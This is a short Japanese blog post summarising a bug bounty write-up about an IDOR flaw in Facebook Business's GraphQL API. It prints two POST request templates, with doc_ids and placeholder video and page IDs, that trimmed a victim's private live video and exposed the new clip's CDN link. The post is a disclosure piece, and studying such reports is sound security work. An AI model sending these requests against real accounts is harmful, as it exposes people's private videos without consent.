Hello there, ('ω')ノ

 

プライベートライブビデオをトリミングしてアクセスしますを。

 

脆弱性：

　IDOR

 

記事：

　https://medium.com/@yaala/trim-private-live-videos-and-access-them-a331447cc82a

 

今回は、単純な脆弱性により、攻撃者はプライベートのライブビデオを

トリミングしてアクセスすることができて。

 

既知の ID により、2 つのgraphql 関数を使用してプライベート ライブ ビデオを

トリミングできて。

 

POST /api/graphql/ HTTP/2
Host: business.facebook.com

variables={“input”:

{“client_mutation_id”:”1",

”actor_id”:”[page_id]”,

”video_id”:”[live_victim_video_id]”,

”trimming_params”:{“trim_before_start”:0,”trim_after_end”:15}

}}

&doc_id=3859231820860792

 

上記のリクエストにより、プライベート ライブ ビデオの 15 秒をトリミングし、

新しいビデオ ID を再生成できて。

 

POST /api/graphql/ HTTP/2
Host: business.facebook.com

variables={“video_id”:”[new_video]”}&doc_id=3561288230642336

 

2 番目のgraphql は cdn link に直接アクセスできて。

 

Best regards, (^^ゞ